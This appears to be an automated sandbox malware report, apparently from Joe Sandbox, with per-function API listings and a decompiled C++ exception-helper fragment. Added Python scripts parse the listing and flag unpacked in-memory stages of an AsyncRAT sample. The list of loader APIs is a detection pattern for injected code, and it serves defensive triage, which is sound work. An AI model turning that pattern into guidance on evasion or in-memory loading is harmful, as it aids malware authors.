                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionH_prolog3_Throwstd::runtime_error::runtime_error
                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                              • API String ID: 1629767425-2556327735
                                                                                                                                                                                                                              • Opcode ID: 9c977657fdbd1a4c4d270aeadb8385d4f71aab12102559d47b5da348e375f92d
                                                                                                                                                                                                                              • Instruction ID: 9debbade18fac8529b99a0876de26e6d22ab70c40b679ec38a357d3faf1036bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c977657fdbd1a4c4d270aeadb8385d4f71aab12102559d47b5da348e375f92d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08D01271D70109AACB85EAE0D9C2EECB33CAF24704F50C1199912B7440DF749B0CC721
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

C-Code - Quality: 42%
    E0125EA2A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
        // Editor's annotation: the int3 runs below are inter-function padding.
        // Every _CxxThrowException call is noreturn, so the decompiler has merged
        // four adjacent throw helpers and a trailing std::string helper into one
        // "function"; read each int3 run as a function boundary.
        intOrPtr _v20;
        char _v24;
        signed int _v44;
        char _v84;
        signed int _v104;
        char _v144;
        signed int _t18;
        signed int _t22;
        intOrPtr* _t26;
        intOrPtr _t28;   // added: used below but left undeclared by the decompiler
        char* _t30;
        char* _t31;
        intOrPtr _t32;
        signed int _t37;
        signed int _t38;
        void* _t41;
        signed int _t42;
        void* _t45;

        _t45 = __eflags;
        _t28 = _v20;
        E0125EC6D(_v20, 1, 0);             // cleanup (subcall frees memory, see APIs)
        _push(0);
        _push(0);
        L01259E2C();                       // _CxxThrowException(0, 0): a bare `throw;` (rethrow)
        asm("int3");
        _t42 = _t41 - 0xc;
        E0125E1B0( &_v24, _t28);           // builds an exception object (exception copy-ctor, see APIs)
        _push(0x125f5a8);                  // pThrowInfo
        _push( &_v24);                     // pExceptionObject
        L01259E2C();                       // _CxxThrowException(&_v24, 0x125f5a8)
        asm("int3");
        _push(_t41);
        _t37 = _t42;
        _t18 =  *0x1260358; // 0xc21f7063
        _v44 = _t18 ^ _t37;                // /GS stack cookie: __security_cookie XOR frame pointer
        _t30 =  &_v84;
        E0125E200(_t30,  &_v24);
        _push(0x125f600);                  // pThrowInfo
        _push( &_v84);                     // pExceptionObject
        L01259E2C();                       // _CxxThrowException(&_v84, 0x125f600)
        asm("int3");
        asm("int3");
        asm("int3");
        asm("int3");
        asm("int3");
        asm("int3");
        asm("int3");
        _push(_t37);
        _t38 = _t42 - 0x2c;
        _t22 =  *0x1260358; // 0xc21f7063
        _v104 = _t22 ^ _t38;               // /GS stack cookie again: a second function's prologue
        _push(_t30);
        _t31 =  &_v144;
        E0125E260(__ebx, _t31, __edi, __esi, _t45);
        _push(0x125f5f0);                  // pThrowInfo
        _push( &_v144);                    // pExceptionObject
        L01259E2C();                       // _CxxThrowException(&_v144, 0x125f5f0)
        asm("int3");
        _push(_t38);
        // The last stub has the shape of MSVC std::string::_Eos(n): store the new
        // size at +0x14 and write the NUL terminator. A capacity (+0x18) of 0x10 or
        // more means the buffer lives on the heap and +4 holds a pointer to it;
        // below 0x10 the 16-byte buffer at +4 is used in place (SSO).
        _t26 = _t31 + 4;
        _t32 = _v144;
         *((intOrPtr*)(_t31 + 0x14)) = _t32;
        if( *((intOrPtr*)(_t31 + 0x18)) >= 0x10) {
            _t26 =  *_t26;
        }
         *((char*)(_t26 + _t32)) = 0;
        return _t26;
    }

Instruction addresses: 0x0125ea2a - 0x0125ead5 (disassembly listing; only the address column survived extraction, the instruction text alongside it is not present in this copy)

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0125EC6D: free.MSVCRT(00000000,00000000,?,?,?,0125EA08,00000001,00000000,00000003,00000010,0125EB62,?,00000007,?,?), ref: 0125EC99
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(00000000,00000000), ref: 0125EA3A
                                                                                                                                                                                                                                • Part of subcall function 0125E1B0: ??0exception@@QAE@ABV0@@Z.MSVCRT(?), ref: 0125E1BF
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(?,0125F5A8), ref: 0125EA5A
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(?,0125F600), ref: 0125EA84
                                                                                                                                                                                                                                • Part of subcall function 0125E260: __EH_prolog3.LIBCMT ref: 0125E267
                                                                                                                                                                                                                                • Part of subcall function 0125E260: ??0exception@@QAE@ABV0@@Z.MSVCRT(?), ref: 0125E275
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(?,0125F5F0), ref: 0125EAB4
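The API lines above follow a fixed text shape, so they can be turned into structured records for pivoting across functions and samples (which calls are direct versus inherited from a callee, which module each import comes from, where the throw sites are). The parser below is an added example by the editor, not part of the Joe Sandbox report or its tooling. It takes the eight lines above as constructed sample input and assumes only the line shape shown there (`• [Part of subcall function <hex>: ]<api>.<module>[(<args>)], ref: <hex>`). The throw-site classification relies on the MSVC convention that `_CxxThrowException(NULL, NULL)` is how a bare `throw;` (rethrow) is compiled; the second argument otherwise points at the ThrowInfo record describing the thrown type.

```python
"""Parse the "APIs" lines of a Joe Sandbox function block into records.

Added helper, not part of the Joe Sandbox report. Assumed line shape:
    • [Part of subcall function <hex>: ]<api>.<module>[(<args>)], ref: <hex>
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple, Union

# Constructed sample input: the eight "APIs" lines from the block above.
SAMPLE_API_LINES = """\
• Part of subcall function 0125EC6D: free.MSVCRT(00000000,00000000,?,?,?,0125EA08,00000001,00000000,00000003,00000010,0125EB62,?,00000007,?,?), ref: 0125EC99
• _CxxThrowException.MSVCRT(00000000,00000000), ref: 0125EA3A
• Part of subcall function 0125E1B0: ??0exception@@QAE@ABV0@@Z.MSVCRT(?), ref: 0125E1BF
• _CxxThrowException.MSVCRT(?,0125F5A8), ref: 0125EA5A
• _CxxThrowException.MSVCRT(?,0125F600), ref: 0125EA84
• Part of subcall function 0125E260: __EH_prolog3.LIBCMT ref: 0125E267
• Part of subcall function 0125E260: ??0exception@@QAE@ABV0@@Z.MSVCRT(?), ref: 0125E275
• _CxxThrowException.MSVCRT(?,0125F5F0), ref: 0125EAB4
"""

_LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Za-z0-9_]+)"   # decorated C++ names contain '?' and '@'
    r"(?:\((?P<args>[^)]*)\))?"                # argument list is absent for prolog helpers
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

Arg = Union[int, str, None]


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: Tuple[Arg, ...]
    ref: int                    # address of the call instruction
    subcall_of: Optional[int]   # set when the call sits inside a callee, not this function


def _parse_arg(raw: str) -> Arg:
    raw = raw.strip()
    if raw == "?":
        return None             # the sandbox could not resolve this value
    try:
        return int(raw, 16)     # values are printed as zero-padded hex
    except ValueError:
        return raw              # keep anything non-hex (e.g. a string literal) verbatim


def parse_api_lines(text: str) -> List[ApiRef]:
    refs: List[ApiRef] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = m.group("args")
        refs.append(ApiRef(
            api=m.group("api"),
            module=m.group("mod"),
            args=tuple(_parse_arg(a) for a in args.split(",")) if args else (),
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return refs


def direct_calls(refs: List[ApiRef]) -> List[ApiRef]:
    """Calls made by this function itself, excluding those attributed to callees."""
    return [r for r in refs if r.subcall_of is None]


def throw_sites(refs: List[ApiRef]) -> List[Tuple[int, Optional[Arg], str]]:
    """(call address, pThrowInfo, kind) for each direct _CxxThrowException.

    _CxxThrowException(pExceptionObject, pThrowInfo): a null pThrowInfo is the
    compiler's encoding of a bare `throw;` (rethrow of the in-flight exception).
    """
    out = []
    for r in direct_calls(refs):
        if r.api != "_CxxThrowException":
            continue
        throw_info = r.args[1] if len(r.args) > 1 else None
        kind = "rethrow" if throw_info == 0 else "throw"
        out.append((r.ref, throw_info, kind))
    return out


def module_histogram(refs: List[ApiRef]) -> Dict[str, int]:
    """How many referenced imports come from each module (MSVCRT, LIBCMT, ...)."""
    return dict(Counter(r.module for r in refs))


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for addr, info, kind in throw_sites(parsed):
        print(f"{addr:08X}: {kind} pThrowInfo={info:08X}" if info else f"{addr:08X}: {kind}")
    print(module_histogram(parsed))
```

Run stand-alone it lists the four throw sites (the first, at 0125EA3A, as a rethrow, the others with their ThrowInfo addresses) and the per-module import counts; feeding it the API block of another function in the same report gives records keyed on the same fields, which is what makes cross-function comparison cheap.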
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrow$??0exception@@V0@@$H_prolog3free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1064778723-0
                                                                                                                                                                                                                              • Opcode ID: 3a7bec15d3ce5513f358d42aae98becaef27de47a530b945b4284aa96d7fb65d
                                                                                                                                                                                                                              • Instruction ID: ea2a7e70dbae575eb428b551161da552664cb8fd34cde13476ca82e60691411d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a7bec15d3ce5513f358d42aae98becaef27de47a530b945b4284aa96d7fb65d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B01B171D2020CBBCF44FFB9DC89EEEB37C9B18604F204425E92077484EDB0AA088665
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

Executed Functions

APIs
• GetCurrentConsoleFontEx.KERNELBASE(?,?,?), ref: 00EBC96D
Memory Dump Source
• Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
Similarity
• API ID: ConsoleCurrentFont

APIs
• SetThreadPreferredUILanguages.KERNELBASE(?,00000000,?), ref: 00EB4BDC
Memory Dump Source
• Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
Similarity
• API ID: LanguagesPreferredThread

APIs
• SetThreadPreferredUILanguages.KERNELBASE(?,00000000,?), ref: 00EB4BDC
Memory Dump Source
• Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
Similarity
• API ID: LanguagesPreferredThread

APIs
• CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00EBC732
Memory Dump Source
• Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
Similarity
• API ID: CreateFile

APIs
• GetCurrentConsoleFontEx.KERNELBASE(?,?,?), ref: 00EBC96D
Memory Dump Source
• Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
Similarity
• API ID: ConsoleCurrentFont

Memory Dump Source
• Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
Similarity
• API ID: ConsoleMode

APIs
• GetConsoleMode.KERNELBASE(?,?), ref: 00EBDAE2
Memory Dump Source
• Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
Similarity
• API ID: ConsoleMode

APIs
• GetFileAttributesW.KERNELBASE(00000000), ref: 00EB9D68
Memory Dump Source
• Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
Similarity
• API ID: AttributesFile

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 00EB9D68
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 99bc95406141f1530a75352131b786d2fc5dd257754be01c6fdd08c767dd4c41
                                                                                                                                                                                                                              • Instruction ID: f69e9be4c44b613863cf5dbdc6e6ce20c214129945d9cc0ef43698d59c38948c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99bc95406141f1530a75352131b786d2fc5dd257754be01c6fdd08c767dd4c41
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D2133B1D006599BCB10CFAAD444BDEFBB4FB49314F10812AD919B7340D774A904CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNELBASE(?,?), ref: 00EBDAE2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: 7da1cb2b9e96b4243e78e605c2d83c2fd5b9f6a798415b82136e86e8205582e2
                                                                                                                                                                                                                              • Instruction ID: bdb1ea53c03c7e7829392abdcb13c5a91d204a4bb203b7b369e120d3447fd1d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da1cb2b9e96b4243e78e605c2d83c2fd5b9f6a798415b82136e86e8205582e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 071114B1D0025A9FDB10CF9AC884BDEFBB4BB48324F10812AD518B7240D378A945CFE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

Non-executed Functions

Executed Functions

                                                                                                                                                                                                                              • Instruction ID: d709c858a586fbf0f786ed93b19eff8ba920803bd96df542787d3b09ccf58b5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b90cd662ad1ce27d3cc71e76b500d8648ec9fbf4c44e196409bcdd2de61f46e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7218BB68043899FEB10CFA9C485AEFBBF4EB49314F14805ED515AB241C7349506CFA2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 0723223B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.533989885.0000000007230000.00000040.00000001.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: 6eaf8d75120e9a031531b9dddaf72c4a83996d7d43042e5e7610a3e916fb8a43
                                                                                                                                                                                                                              • Instruction ID: b86eae5bf8450c57e07bbd641bce15e157bc13aed08b52cecf97b02e7d2dbbed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6eaf8d75120e9a031531b9dddaf72c4a83996d7d43042e5e7610a3e916fb8a43
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D22148B59003499FDB10DFAAC844BDEBBF4FB49314F14806AE558A7251D3389549CFA2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ACBBB6,?,?,?,?,?), ref: 02ACBC77
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                                                              • Opcode ID: ef41a33972aed2db15f90c8c86660062d34b00a7caa953d122a68531766f7fdd
                                                                                                                                                                                                                              • Instruction ID: b21607b9a4208964074f78b0be857307a960fa8771ee0df50be70e2b0592c64f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef41a33972aed2db15f90c8c86660062d34b00a7caa953d122a68531766f7fdd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C62103B5900248EFDB10CFAAD984ADEBBF8EB48324F14841AE914B7310D775A944CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ACBBB6,?,?,?,?,?), ref: 02ACBC77
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                                                              • Opcode ID: b676f539b86eaf60b5b01f3e61cb53c342e5512acf778977b3ff99dc76bfe1ec
                                                                                                                                                                                                                              • Instruction ID: 93fd70fe8f9142116caa8faa0e622bf3b54494460799d6e796a3faa1d353a53c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b676f539b86eaf60b5b01f3e61cb53c342e5512acf778977b3ff99dc76bfe1ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E21E4B5900248EFDB10CFAAD584ADEFBF4FB48324F14841AE918A7310D775A945CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 0723223B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.533989885.0000000007230000.00000040.00000001.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: 852aca28cb50bee83afd8d030451983b13b0a52910dbfdbf8b3e7585181191d6
                                                                                                                                                                                                                              • Instruction ID: f81c86d2d5c2dcc01c5b861af9aaeb53755d8bd4f90fcbb1b9c35e7cc16cf899
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 852aca28cb50bee83afd8d030451983b13b0a52910dbfdbf8b3e7585181191d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 472106B5D002499FDB10CF9AD984BDEFBF4FB48320F108429E958A7240D378A945CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02AC9991,00000800,00000000,00000000), ref: 02AC9BA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                              • Opcode ID: f274943de27a90f97c71190ff0c0a11b45ea138a140c7a310d7cd9480b5c6bba
                                                                                                                                                                                                                              • Instruction ID: bfc366bd2c20484eb1b3687581512c29bd429856275da404f675b7a1fad2502e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f274943de27a90f97c71190ff0c0a11b45ea138a140c7a310d7cd9480b5c6bba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F51103B69002499FDB10CFAAC484ADEFBF5EB88324F10842ED919A7200C775A645CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02AC9991,00000800,00000000,00000000), ref: 02AC9BA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                              • Opcode ID: 09e321a7c52089ae785b5e2805ff75a52b3fa6bbc5c0c07f32082c51e9967711
                                                                                                                                                                                                                              • Instruction ID: 69a7796034bd33c1e20b12f538833d65ef514908cd6941709321749b2178f976
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09e321a7c52089ae785b5e2805ff75a52b3fa6bbc5c0c07f32082c51e9967711
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F51103B69003499FDB10CF9AC484AEEFBF4EB88324F14846ED915A7200C775A545CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02AC9916
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                                                              • Opcode ID: 440d0bb1b18bb74b200a3f70f0ec1b0709ff3ffe02581eae4140364e336d727d
                                                                                                                                                                                                                              • Instruction ID: e824c0a387fc4138a26f34ea1616c1e70aa72daa4fcec5ad6b6c3ee340ae679a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 440d0bb1b18bb74b200a3f70f0ec1b0709ff3ffe02581eae4140364e336d727d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B111DFB5D007498FDB10CFAAC584BDEFBF4EB88324F14845AD829A7610D778A545CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%
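The listing above is the raw per-function view, and the detail that matters for triage is buried in the "Source File" lines: every one of these VirtualProtect, LoadLibraryExW, DuplicateHandle and GetModuleHandleW callers lives in a memory dump marked "based on PE: false", i.e. executable memory with no module on disk behind it, which is what an unpacked or injected stage looks like. The script below is an added example written for this page, not code from Joe Sandbox or from the report: it parses the function blocks in the format shown, groups them by process and region, and flags unbacked executable regions that call loader-style APIs. The constructed sample is copied from the blocks above. The field order assumed for the .sdmp name (pid.run.dumpid.base.protect.type) and the reading of the fifth field as a Windows page-protection value (0x40 = PAGE_EXECUTE_READWRITE) are the example author's assumptions, not something the report states.

```python
"""Triage helper for the per-function API listing of a sandbox report.

Added example, not part of the original report. It parses the
"APIs / Memory Dump Source / Similarity" blocks into records and
summarises which Win32 APIs were hit from which memory region, flagging
regions that are executable but not backed by a PE on disk.
"""
import re

# Constructed sample: four blocks copied from the listing on this page.
SAMPLE = """\
APIs
• VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 0723223B
Memory Dump Source
• Source File: 00000020.00000002.533989885.0000000007230000.00000040.00000001.sdmp, Offset: 07230000, based on PE: false
Similarity
• API ID: ProtectVirtual
• Opcode ID: 6eaf8d75120e9a031531b9dddaf72c4a83996d7d43042e5e7610a3e916fb8a43
Uniqueness
Uniqueness Score: -1.00%
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ACBBB6,?,?,?,?,?), ref: 02ACBC77
Memory Dump Source
• Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
Similarity
• API ID: DuplicateHandle
• Opcode ID: ef41a33972aed2db15f90c8c86660062d34b00a7caa953d122a68531766f7fdd
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02AC9991,00000800,00000000,00000000), ref: 02AC9BA2
Memory Dump Source
• Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
Similarity
• API ID: LibraryLoad
• Opcode ID: f274943de27a90f97c71190ff0c0a11b45ea138a140c7a310d7cd9480b5c6bba
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02AC9916
Memory Dump Source
• Source File: 00000020.00000002.520647508.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
Similarity
• API ID: HandleModule
• Opcode ID: 440d0bb1b18bb74b200a3f70f0ec1b0709ff3ffe02581eae4140364e336d727d
"""

API_RE = re.compile(r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (?P<name>\S+)\.sdmp, Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
OPCODE_RE = re.compile(r"^• Opcode ID: (?P<opcode>[0-9a-f]{64})$")

# Windows page-protection bits that grant execute (PAGE_EXECUTE* = 0x10..0x80).
EXECUTABLE_MASK = 0xF0
# APIs that read as "in-memory loader" behaviour when called from unbacked code.
LOADER_APIS = {"VirtualProtect", "VirtualAlloc", "LoadLibraryExW", "LoadLibraryW",
               "GetProcAddress", "WriteProcessMemory"}


def parse_blocks(text):
    """Return one dict per function block (each starts with an 'APIs' line)."""
    blocks, block = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            block = {"apis": []}
            blocks.append(block)
            continue
        if block is None:
            continue
        if m := API_RE.match(line):
            block["apis"].append({"api": m["api"], "module": m["module"],
                                  "args": m["args"].split(","), "ref": int(m["ref"], 16)})
        elif m := SRC_RE.match(line):
            # Assumed layout of the dump name: pid.run.dumpid.base.protect.type (all hex).
            pid, run, dump_id, base, protect, mtype = m["name"].split(".")
            block["region"] = {"pid": int(pid, 16), "base": int(base, 16),
                               "protect": int(protect, 16), "dump": m["name"] + ".sdmp",
                               "pe_backed": m["pe"] == "true"}
        elif m := OPCODE_RE.match(line):
            block["opcode"] = m["opcode"]
    return blocks


def summarize_regions(blocks):
    """Group parsed blocks by (pid, region base) and collect the APIs each region calls."""
    regions = {}
    for b in blocks:
        reg = b.get("region")
        if reg is None:
            continue
        entry = regions.setdefault((reg["pid"], reg["base"]), {
            "dump": reg["dump"], "protect": reg["protect"], "pe_backed": reg["pe_backed"],
            "functions": 0, "apis": set(), "opcodes": set()})
        entry["functions"] += 1
        entry["apis"].update(a["api"] for a in b["apis"])
        if "opcode" in b:
            entry["opcodes"].add(b["opcode"])
    return regions


def flag_unbacked_loaders(regions):
    """Keys of executable, non-PE-backed regions that call loader-style APIs."""
    return [key for key, r in regions.items()
            if not r["pe_backed"] and r["protect"] & EXECUTABLE_MASK and r["apis"] & LOADER_APIS]


if __name__ == "__main__":
    regions = summarize_regions(parse_blocks(SAMPLE))
    for (pid, base), r in sorted(regions.items()):
        print(f"pid {pid} base {base:#x} protect {r['protect']:#x} pe_backed={r['pe_backed']} "
              f"functions={r['functions']} apis={sorted(r['apis'])}")
    print("flagged:", [f"{pid}:{base:#x}" for pid, base in flag_unbacked_loaders(regions)])
```

Run against the sample, both regions of process 0x20 (0x2AC0000 and 0x7230000) come out flagged: each is PAGE_EXECUTE_READWRITE with no PE behind it and reaches VirtualProtect or LoadLibraryExW. On a full report the same pass over all blocks gives you the list of dump files worth carving for the unpacked AsyncRAT stage instead of reading the listing by hand.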

Non-executed Functions